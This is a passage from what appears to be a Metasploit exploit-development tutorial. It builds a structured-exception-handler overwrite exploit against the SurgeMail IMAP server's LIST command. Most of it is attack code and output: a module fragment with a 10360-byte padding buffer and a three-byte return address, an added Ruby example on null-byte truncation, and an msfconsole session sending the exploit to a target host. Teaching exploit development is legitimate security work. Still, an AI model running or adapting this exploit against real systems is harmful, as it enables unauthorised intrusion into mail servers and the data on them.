Creating Your Own Exploits
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => "\x7e\x51\x78" } ], # p/p/r in surgemail.exe
        ],
      'DisclosureDate' => 'March 13 2008',
      'DefaultTarget'  => 0))
  end

  def exploit
    connected = connect_login                 # IMAP login via the module's mixin
    lead = "\x41" * 10360                     # padding up to the SEH record
    evil = lead + [target.ret].pack("A3")     # three-byte return address from 'Targets'
    print_status("Sending payload")
    sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
To perform a three-byte overwrite of the SEH, we set the three bytes to be added to the buffer in the 'Targets' block, in little-endian order, as shown in the listing. (Endianness is determined by the target CPU's architecture, and Intel-compatible processors use little-endian byte ordering.) In the exploit method we replace the three Cs in the evil string with [target.ret].pack("A3"), which sends the return address exactly as it is declared in the 'Targets' block. When modifying many exploits that use a three-byte overwrite, you can declare the target address literally (0x0078517e in this case) and Metasploit will automatically order the bytes correctly when you use [target.ret].pack('V'). This scenario requires more granular control, because if we were to send the null (00) byte, it would represent the end of a string and could prevent the exploit from functioning properly.
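The byte-ordering point above, as an added example that is not code from the book's module: it contrasts what pack('V') and the three-byte pack("A3") form produce for 0x0078517e, and models why a null byte in the middle of the command loses everything after it. The address, the 10360-byte lead and the trailer are from the page; the bad-character set and the C-string server model are assumptions.

```ruby
# Added example, not code from the book's surgemail module. Shows why the
# module emits the return address as three bytes rather than the full
# little-endian dword that pack('V') produces. Address, lead length and
# trailer come from the page; bad characters and server model are assumed.

# What Metasploit's [addr].pack('V') does: 32-bit little-endian, low byte first.
def pack_le32(addr)
  [addr].pack('V')
end

# Assumed bad characters for this IMAP command: NUL ends a C string,
# CR and LF end the IMAP line.
BAD_CHARS = [0x00, 0x0d, 0x0a].freeze

# Model of a server routine that copies its argument as a C string:
# everything from the first NUL onward is lost.
def as_c_string(buf)
  nul = buf.index("\x00".b)
  nul ? buf[0, nul] : buf
end

# Choose how to emit a return address for the SEH overwrite:
# - the full dword when it contains no bad characters;
# - the low three bytes when only the top byte is 0x00 (the 0x0078517e
#   case): in the C-string model the terminator written after the copy
#   supplies that 0x00; nil otherwise (no simple encoding exists).
def seh_overwrite_bytes(addr, bad = BAD_CHARS)
  full = pack_le32(addr)
  return full if (full.bytes & bad).empty?
  low3 = full[0, 3]
  return low3 if full.bytes[3] == 0x00 && (low3.bytes & bad).empty?
  nil
end

# Assemble the LIST argument the way the page does (lead of 'A's, then the
# return address, then the rest of the command) and report how many bytes
# the C-string copy keeps, so both encodings can be compared.
def surviving_bytes(ret_bytes, lead_len = 10360, trailer = '" "PWNED"')
  evil = ("\x41" * lead_len).b + ret_bytes.b
  as_c_string(evil + trailer.b).bytesize
end

if __FILE__ == $0
  addr = 0x0078517e
  puts pack_le32(addr).unpack1('H*')                 # 7e517800
  puts seh_overwrite_bytes(addr).unpack1('H*')       # 7e5178
  puts surviving_bytes(pack_le32(addr))              # 10363: trailer lost at the NUL
  puts surviving_bytes(seh_overwrite_bytes(addr))    # 10372: whole command survives
end
```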
Now is a good time to run the exploit to make sure that it works properly. If you jump too far ahead when developing an exploit, you run the risk of making an error somewhere and having to do a lot of backtracking to find out what went wrong. Here's the exploit:
msf > use exploit/windows/imap/surgemail_book
msf exploit(surgemail_book) > set IMAPPASS test
IMAPPASS => test
msf exploit(surgemail_book) > set IMAPUSER test
IMAPUSER => test
msf exploit(surgemail_book) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(surgemail_book) > set PAYLOAD generic/debug_trap
PAYLOAD => generic/debug_trap
msf exploit(surgemail_book) > exploit
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >